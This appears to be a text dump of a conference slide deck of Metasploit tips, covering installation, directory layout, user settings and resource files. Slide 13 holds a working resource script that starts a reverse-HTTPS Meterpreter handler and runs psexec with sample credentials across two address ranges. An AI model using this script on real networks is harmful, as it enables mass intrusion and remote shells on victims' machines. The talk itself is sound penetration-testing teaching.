Metasploit magic the dark corners of the framework

  1. 1. Metasploit Magic A little sleight of hand
  2. 2. But first...
  3. 3. Installing Metasploit svn co https://metasploit.com/svn/trunk msf
  4. 4. not.. here
  5. 5. ESPECIALLY not here
  6. 6. it is a SYN
  7. 7. SRSLY!
  8. 8. here is ok ;-)
  9. 9. and remember... this isn’t the only place you can install it...
  10. 10. Directory Structure: HACKING, msfd, msfrpcd, documentation, msfmachscan, psexec.rc, msfconsole, msfrpc, armitage, msfgui, plugins, data, msfpescan, scripts, msfcli, tools, README, msfencode, bins, modules, msfpayload, external, msfelfscan, msfupdate, lib, msfopcode
  11. 11. ~/.msf3/ • history, logs, loot • msfconsole.rc • YOUR SETTINGS • modules • YOUR MODULES
  12. 12. resource files • line by line script • can understand ruby • for meterpreter sessions now! • ./msfconsole -r psexec.rc • msf> resource psexec.rc
  13. 13. psexec scanner

          # Start one payload handler as a background job
          use multi/handler
          setg PAYLOAD windows/meterpreter/reverse_https
          setg LHOST 192.168.1.100
          setg LPORT 443
          set ExitOnSession false
          exploit -j -z

          # Configure psexec; it reuses the handler started above
          use windows/smb/psexec
          set SMBUser AdminBob
          set SMBPass ThisPasswordSucks
          set SMBDomain .
          set DisablePayloadHandler true

          # Embedded Ruby: walk the address ranges and run the module per host
          <ruby>
          require 'rex/socket/range_walker'

          rhosts = '10.10.10.0/24,10.10.14.0/24'

          iplist = Rex::Socket::RangeWalker.new(rhosts)
          iplist.each do |rhost|
            self.run_single("set RHOST #{rhost}")
            self.run_single("exploit -j -z")
          end
          </ruby>
  17. 17. magic • user .*psexec
  18. 18. other fun... • script • color = false • screen
  19. 19. meterpreter>guid • twitter.com/mubix • mubix[hak5.org]
